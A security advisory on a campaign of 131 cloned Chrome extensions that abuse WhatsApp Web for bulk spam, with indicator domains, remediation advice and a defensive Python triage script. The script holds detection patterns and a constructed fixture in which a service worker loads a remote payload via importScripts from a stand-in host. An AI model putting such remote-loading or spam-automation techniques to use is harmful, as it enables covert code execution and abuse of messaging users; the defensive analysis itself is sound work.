Severity
High
Analysis Summary
A widespread campaign of malicious Chrome extensions impersonating WhatsApp Web automation tools has been uncovered, with 131 fraudulent extensions identified on the Chrome Web Store. Though marketed as unique products, all of them share an identical core codebase. These extensions advertise features like bulk messaging, automated scheduling, message templates, and analytics dashboards, primarily targeting small businesses in Brazil, where WhatsApp is widely used for customer communication. Despite violating Chrome Web Store policies against duplicate functionality and unauthorized messaging, all 131 extensions remained publicly available as of mid-October 2025.
The extensions work by injecting custom JavaScript into the WhatsApp Web interface to automate message delivery without user consent. A core code snippet leverages WhatsApp's internal function (window.WPP.helpers.sendMessage) to send scheduled messages by attaching itself to the DOM during page load. Through this method, the extensions bypass WhatsApp’s built-in anti-spam controls and rate limits. Furthermore, the Chrome Manifest V3 service worker architecture is abused to run background operations, enabling bulk messaging and scheduling tasks even when the WhatsApp Web tab is inactive.
Researchers also discovered advanced dynamic control features that enhance these extensions’ adaptability and stealth. The service worker fetches remote configuration files from the operator's server, allowing real-time updates to messaging patterns, throttling delays, and content to evade spam detection systems. Another persistence method uses the periodicsync event to continuously poll servers for new JavaScript payloads. This enables extensions to reload updated, unflagged malicious scripts even if previous versions are detected or reported. Operators further evade detection by randomizing message content, tuning send intervals, and rotating publisher accounts.
Distribution is structured like a reseller franchise model to maximize reach and profits while hiding the core operator. Resellers pay a fee to access the tool, receive customized branding packages, and sell subscriptions, while the main operator maintains backend infrastructure and control over payload delivery. These extensions are promoted through glossy landing pages with false claims of privacy compliance and security audits, masking their non-compliance with platform policies. With thousands of active users and consistent rebranding efforts, this campaign represents a large-scale abuse of the Chrome Web Store ecosystem and highlights the urgent need for improved extension governance and greater user awareness.
Impact
- Gain Access
Indicators of Compromise
Domain Name
- youseller.com.br
- powerchat.in
- ganadigital.com.br
- wizechat.com.br
- organize-c.com
- zapvende.com
- chattyseller.com
Remediation
- Strengthen Chrome Web Store review processes to detect duplicate codebases, hidden script injections, and unauthorized WhatsApp Web automation.
- Permanently ban developer accounts repeatedly uploading cloned or policy-violating extensions.
- Monitor and flag extensions abusing Manifest V3 features such as service workers and periodicsync for automated messaging.
- Detect and block extensions injecting scripts into WhatsApp Web or using internal APIs like WPP.helpers.sendMessage without consent.
- Restrict extensions from fetching remote configuration files or executing external payloads using importScripts().
- Enhance WhatsApp Web anti-automation controls to identify abnormal messaging volumes, timing anomalies, or non-human interaction patterns.
- Implement browser-side integrity checks to alert users when extensions interact with WhatsApp’s internal functions.
- Enforce enterprise-level extension whitelisting to limit installations to trusted and verified extensions only.
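As an added, defender-side example (not code from this advisory or from the extensions it describes), the Python below triages an unpacked extension for the indicators listed above: an MV3 background service worker, content scripts or host permissions aimed at web.whatsapp.com, a periodicsync handler, importScripts() remote loading, remote configuration fetches and references to WPP.helpers.sendMessage. It also fingerprints the JavaScript with string literals stripped so rebranded copies of one core codebase hash identically. The weights, thresholds, and the sample manifest and sources are this example's own constructed assumptions.

```python
import hashlib
import json
import re

JS_INDICATORS = [  # behaviours the advisory describes, as regexes over the extension's JS
    ("wpp_send_message", 3, re.compile(r"WPP\.helpers\.sendMessage")),
    ("import_scripts", 2, re.compile(r"\bimportScripts\s*\(")),
    ("periodic_sync", 2, re.compile(r"periodicsync", re.I)),
    ("remote_config_fetch", 1, re.compile(r"\bfetch\s*\(\s*['\"]https?://")),
]
STRING_LITERAL = re.compile(r"'(?:\\.|[^'\\])*'|\"(?:\\.|[^\"\\])*\"")

def triage_extension(manifest_json, sources):
    """Score an unpacked extension for the advisory's indicators; sources maps filename -> JS."""
    manifest = json.loads(manifest_json)
    hits, score = {}, 0
    sw = manifest.get("background", {}).get("service_worker")
    if manifest.get("manifest_version") == 3 and sw:  # MV3 background worker present
        hits["mv3_service_worker"], score = sw, score + 1
    targets = [m for cs in manifest.get("content_scripts", []) for m in cs.get("matches", [])]
    wa = sorted(t for t in targets + manifest.get("host_permissions", []) if "web.whatsapp.com" in t)
    if wa:  # content script injection or host access aimed at WhatsApp Web
        hits["targets_whatsapp_web"], score = wa, score + 2
    for name, weight, pattern in JS_INDICATORS:
        files = sorted(f for f, code in sources.items() if pattern.search(code))
        if files:
            hits[name], score = files, score + weight
    verdict = "high" if score >= 7 else "medium" if score >= 4 else "low"
    return {"score": score, "verdict": verdict, "indicators": hits}

def codebase_fingerprint(sources):
    """Hash JS with string literals, comments and whitespace removed, so rebranded clones collide."""
    parts = []
    for name in sorted(sources):
        code = re.sub(r"//[^\n]*", "", STRING_LITERAL.sub('""', sources[name]))
        parts.append(name + ":" + re.sub(r"\s+", "", code))
    return hashlib.sha256("\n".join(parts).encode()).hexdigest()

# Constructed fixture standing in for one rebranded copy of the tool; not a real extension.
SAMPLE_MANIFEST = json.dumps({"manifest_version": 3, "name": "ZapSender Pro",
    "background": {"service_worker": "background.js"},
    "content_scripts": [{"matches": ["https://web.whatsapp.com/*"], "js": ["inject.js"]}]})
SAMPLE_SOURCES = {
    "background.js": "self.addEventListener('periodicsync', () => {\n"
                     "  importScripts('https://cdn.example.invalid/zapsender/payload.js');\n"
                     "  fetch('https://cdn.example.invalid/zapsender/config.json'); });\n",
    "inject.js": "const BRAND = 'ZapSender Pro'; // branding differs per reseller\n"
                 "document.addEventListener('DOMContentLoaded', () => {\n"
                 "  window.WPP.helpers.sendMessage(chat, msg); });\n",
}
```

Running the two functions over a batch of unpacked extensions groups clones by fingerprint and ranks each by score; the fixture above scores 11 ("high").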